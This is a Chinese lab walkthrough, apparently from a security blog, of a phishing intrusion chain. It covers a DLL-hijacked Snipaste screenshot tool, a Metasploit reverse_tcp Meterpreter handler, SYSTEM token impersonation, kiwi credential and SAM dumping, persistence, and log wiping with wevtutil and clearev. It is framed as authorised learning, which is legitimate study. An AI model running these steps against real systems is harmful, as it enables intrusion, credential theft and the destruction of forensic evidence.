钓鱼渗透进阶完整流程 📅 2026/7/13 16:41:08 钓鱼渗透进阶完整流程用途网络安全学习分享仅限授权环境测试一、实验环境角色系统/工具IP地址攻击机Windows 11矛盾武器库10.0.0.166靶机Windows 10 x6410.0.0.153攻击机Windows 11 Penetration Suite Toolkit - VMware Workstation矛盾武器库可以去下载靶机普通win10 X64二、实验攻击链路SnipasteDLL劫持寄生在合法程序里程序正常使用中连接攻击机。攻击机开启 HTTP 服务供靶机下载病毒软件。MSFconsole Handler在攻击机监听指定端口等待靶机上线。靶机执行 Payload后Meterpreter 会话建立进入后渗透阶段。Meterpreter提权获取信息清楚痕迹。三、实验步骤不用关靶机防火墙和实时防护只需确认靶机能否ping通攻击机打开攻击机的8080和4444端口让靶机能够正常访问netsh advfirewall firewall add rule nameHTTP_8080 dirin actionallow protocoltcp localport8080netsh advfirewall firewall add rule nameMSF_4444 dirin actionallow protocoltcp localport4444在攻击机上准备钓鱼文件一款截图工具我自己修改过源码靶机截图的时候就会连接攻击机然后在钓鱼文件所在位置开启http服务模拟网站python3 -m http.server 8080打开MSF使用模块监听攻击机自带矛盾武器库自行搜索MSF操作看上一篇文章use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST 10.0.0.166set LPORT 4444exploit切换到靶机下载文件成功下载文件并启动没有触发任何防护现在点击F1截屏攻击机连接成功现在进行后渗透操作先检测一下系统和当前身份靶机登录管理员我们可以换到systemGetsystem直接命名管道模拟测试失败靶机显示检测到漏洞但并没有把我们杀掉我们隐身借用load incognitolist_tokens -uimpersonate_token NT AUTHORITY\SYSTEM切换成功现在可以看看我们的权限现在获取一些信息单靶机无法横向移动看到我们的后门了现在查点有用的先注入kiwi查看所有凭据看看注册表sam数据库密码数据都拿到了之后就是持久化方法多种多样自行发挥比如留个后门新建账户我改的Snipaste能够开机自启这也算一种持久化然后就是清理痕迹Clearev Windows 事件日志shellwevtutil cl System # 系统日志wevtutil cl Security # 安全日志wevtutil cl Application # 应用程序日志wevtutil cl Setup # 系统安装/更新日志wevtutil cl ForwardedEvents # 从其他机器转发来的日志doskey /listsize0 # 清 cmd 历史Remove-Item ...HistorySavePath # 清 PowerShell 历史arp -d * # 清空 ARP 缓存ipconfig /flushdns # 清空 DNS 缓存完成netsh advfirewall firewall delete rule nameHTTP_8080netsh advfirewall firewall delete rule nameMSF_4444关闭攻击机8080和4444端口结束以上仅作学习分享。